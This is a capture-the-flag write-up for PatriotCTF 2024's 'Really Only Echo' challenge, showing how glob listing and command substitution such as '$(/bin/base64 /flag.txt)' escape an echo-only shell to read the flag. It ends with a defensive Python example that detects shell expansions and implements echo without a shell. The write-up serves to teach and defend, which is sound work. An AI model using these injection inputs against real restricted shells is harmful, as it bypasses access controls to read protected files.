# PatriotCTF 2024 - Really Only Echo

**Title:** Really Only Echo

**Description:** Hey, I have made a terminal that only uses echo, can you find the flag?

`nc chal.competitivecyber.club 3333`

**Files:** [server.py](https://github.com/xtasy94/CTFW/blob/main/PatriotCTF%202024/ReallyOnlyEcho/Files/server.py)

## Solution:

In this challenge we are given a terminal where we can only use the `echo` command. The first step is to locate where the flag might be, so I start searching from the root directory. The shell expands the glob before `echo` runs, so `echo /*` works as a directory listing:

```bash
Please input command: echo /*
/bin /boot /dev /etc /flag.txt /home /lib /lib64 /media /mnt /opt /proc /root /run /sbin /srv /sys /tmp /usr /var
```

And there's the `flag.txt` file. Naturally, the next step is to attempt to read it using `echo`:

```bash
Please input command: echo $(</flag.txt)
```

Unfortunately, this attempt to read the file fails. Since direct access to the file is blocked, I decide to explore `/bin`, which contains various executable programs. By listing the contents of `/bin`, I look for something that can help:

```bash
Please input command: echo /bin/*
/bin/[ /bin/base64 /bin/cat /bin/echo /bin/bash ...
```

I spot `/bin/base64`, a program that can encode or decode base64 strings. Using this tool inside a command substitution, I attempt to base64-encode the contents of the flag and let `echo` print the result:

```bash
Please input command: echo $(/bin/base64 /flag.txt)
cGN0ZntlY2hvX2lzX3N1Y2hfYV92ZXJzYXRpbGVfY29tbWFuZH0=
```

The output is a base64-encoded string. Decoding this string gives us the flag:

```bash
$ echo "cGN0ZntlY2hvX2lzX3N1Y2hfYV92ZXJzYXRpbGVfY29tbWFuZH0=" | base64 -d
pctf{echo_is_such_a_versatile_command}
```
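
Why an echo-only restriction like this fails, and one way to close it, as an added example that is not the challenge's `server.py`: it assumes the server only checks that the input starts with `echo` and then hands the whole line to a shell (the page does not show that check). The names `naive_allow`, `find_expansions` and `safe_echo` are hypothetical.

```python
import re
import shlex

# Shell constructs that let an "echo-only" prompt do more than print text.
# Command substitution, globbing and `<` all appear in the write-up's commands.
EXPANSIONS = {
    "command substitution": re.compile(r"\$\(|`"),
    "pathname glob": re.compile(r"[*?\[]"),
    "variable expansion": re.compile(r"\$[A-Za-z_{]"),
    "control operator or redirect": re.compile(r"[;&|<>\n]"),
}


def naive_allow(cmd: str) -> bool:
    """Assumed weak check: only the first word of the line is inspected."""
    return cmd.split(maxsplit=1)[:1] == ["echo"]


def find_expansions(cmd: str) -> list:
    """Name every shell expansion class present in the command line."""
    return [name for name, rx in EXPANSIONS.items() if rx.search(cmd)]


def safe_echo(cmd: str) -> str:
    """Hardened handler: implement echo in-process, never spawn a shell."""
    argv = shlex.split(cmd)          # tokenise only; nothing is expanded
    if not argv or argv[0] != "echo":
        raise ValueError("only echo is allowed")
    return " ".join(argv[1:])        # arguments come back as literal text


# Constructed sample input: the commands typed in the write-up, plus a benign one.
SAMPLES = ["echo /*", "echo $(</flag.txt)", "echo /bin/*",
           "echo $(/bin/base64 /flag.txt)", "echo hello world"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:36} naive={naive_allow(s)} "
              f"flags={find_expansions(s)} safe={safe_echo(s)!r}")
```

Every sample passes the first-word check, yet only the last one is free of shell expansions; `safe_echo` returns the arguments as literal text because no shell ever sees them.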